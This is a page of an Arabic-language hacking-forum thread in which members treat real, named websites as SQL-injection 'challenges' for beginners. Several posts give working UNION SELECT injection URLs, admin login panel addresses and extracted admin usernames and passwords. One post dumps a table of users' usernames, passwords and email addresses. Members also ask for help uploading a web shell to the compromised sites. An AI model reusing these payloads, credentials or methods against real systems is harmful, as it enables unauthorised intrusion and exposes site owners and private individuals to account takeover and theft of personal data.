:: vBspiders Professional Network :: - تحديات خاصة بالمبتدئين في دورة sql

صفحة 2 من 6

الأخيرة »

عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- جـــ'ابات العناكــ'ب (http://www.vbspiders.com/vb/f343.html)

- - تحديات خاصة بالمبتدئين في دورة sql (http://www.vbspiders.com/vb/t31386.html)

marrak

07-02-2010 07:51 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة lifenote (المشاركة 162145)

الموقع ما يضهر لي عليه خطا أخي

^_^

/////////

انضر اخي هنا

كود:

http://accesscourses.net/fr/news_detail.php?id=-1%20union%20select%201,concat%28login,0x3a,pass%29,3,4,5,6+from+client--

هل لي برابط لوحة التحكم ؟؟ او طريقة لتخمينها تكون سهلة لاني اضمن لك انه اليدوي ما ينفع
و حتى برنامج AdminPage

اخي الكريم
انتبه جيدا للدروس
عوض concat اكتب group_cancat وتنحل المشكلة
لك تحياتي

marrak

07-02-2010 07:58 PM

السلام عليكم
الموقع التالي
http://www.amaigabeko.com/
الثغرة sql
الاصدار 5
لكم تحياتي

TheGame

07-02-2010 09:06 PM

اول شي اشكرك اخي على الموضوع الرائع الله يجازيك الف خير ثانيا

تم اخراج اليوزر والباس

اليوزر: delider
الباسوورد: stormfury
وهذا لوحة التحكم

http://www.amaigabeko.com/admin/login.html

وشكرا

the cold zero

07-02-2010 09:45 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 162558)

تسلم يا بطل

وفى انتظار الموقع القادم..

marrak

07-03-2010 12:12 AM

السلام عليكم
اليكم الموقع التالي
http://www.flhsbaseballreport.com/
الثغرة sql
الاصدار 5
المرجو وضع رابط الاستغلال كاملا .
لكم تحياتي

TheGame

07-03-2010 12:58 PM

السلام عليكم

تم اخراج اليوزر والباس بس بصراحة مامتاكد منه لان مافي امتيازات الادمن ؟؟؟؟ ياريت لو تشوفونة

والان رابط الاستغلال

http://www.flhsbaseballreport.com/pl...rom+s_contacts

رابط لوحة التحكم

http://www.flhsbaseballreport.com/coachadmin/login.php

اليوزر: herreraa@dadeschools.net
الباس : cougars

لاكن نريد طرق لرفع الشيل ياريت لو تعلمونة طريقة رفع الشل وشكرا

marrak

07-03-2010 08:05 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 162943)

اخي الكريم
هل تأكدت من صحة المعلومات
لك تحياتي

TheGame

07-03-2010 08:20 PM

اخي في الموقع مكانين لدخول الادمن

هذا واحد منهم
http://www.flhsbaseballreport.com/coachadmin/login.php

وجربته عليه ودخل بس الثاني مايدخل

وهذا الثاني

http://www.flhsbaseballreport.com/directory/login.php

في صفحة اسمه directory طلعت الاعمدة المصابة وهذا هوه الرابط

http://www.flhsbaseballreport.com/di...select+1,2,3--

لاكن union+select عند استعمال يظهر خطا

وجربت ببرنامج havij ييقول انو هذه الصفحة اصدار قاعدة البيانات 4 لاكن ماطلع الاعمدة

هل من الممكن ان يكون في موقع واحد اصدارين

بس الاول الله شاهد انا طلعته بدون برنامج يعني يدوي والثاني لان ماطلع يدوي استعملت البرنامج لاكن بدون فائدة

the cold zero

07-04-2010 12:17 AM

انتظرنى راح اجيب لك الاستغلال كامل

m0h@med

07-04-2010 01:15 AM

Sql helper
بيقول URL is not vulnerable
شوف سكريبت اخر
و الله أعلم

m0h@med

07-04-2010 01:31 AM

http://www.flhsbaseballreport.com/ed...hema.columns--

TheGame

07-04-2010 02:58 AM

اقتباس:

المشاركة الأصلية كتبت بواسطة m0h@med (المشاركة 163403)

http://www.flhsbaseballreport.com/ed...hema.columns--

؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ smilies9

marrak

07-04-2010 02:35 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة TheGame (المشاركة 163451)

؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟ smilies9

username password email
Andy Barkett bubbadog info@baseballpros.net
sissyfig millennium sissyfig59@aol.com
igolf234 right1 arobinson5678@aol.com
mcisme06 dramaomg6 mcisme06@aol.com
goldglove2b ttrryy justin@probaseballtips.com
LockeJET ALEXANDER CHAD.WEISSMAN@AGRIFLORA.COM

marrak

07-04-2010 02:36 PM

السلام عليكم

الموقع التالي
http://www.uidjournal.com/
اصدار القاعدة 5
لكم تحياتي

TheGame

07-04-2010 09:52 PM

تم اخراج اليوزر والباس

رابط الدخول

http://www.uidjournal.com/admin/

اليوزر : [gdwl]ryan@gozipline.com[/gdwl]
الباسوورد : [gdwl]password[/gdwl]

[warning]

<ياريت لو ترفعولي شل على الموقع >
[/warning]

الساعة الآن 11:35 PM

صفحة 2 من 6

الأخيرة »

عرض 40 مشاركات من هذا الموضوع لكل صفحة

[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0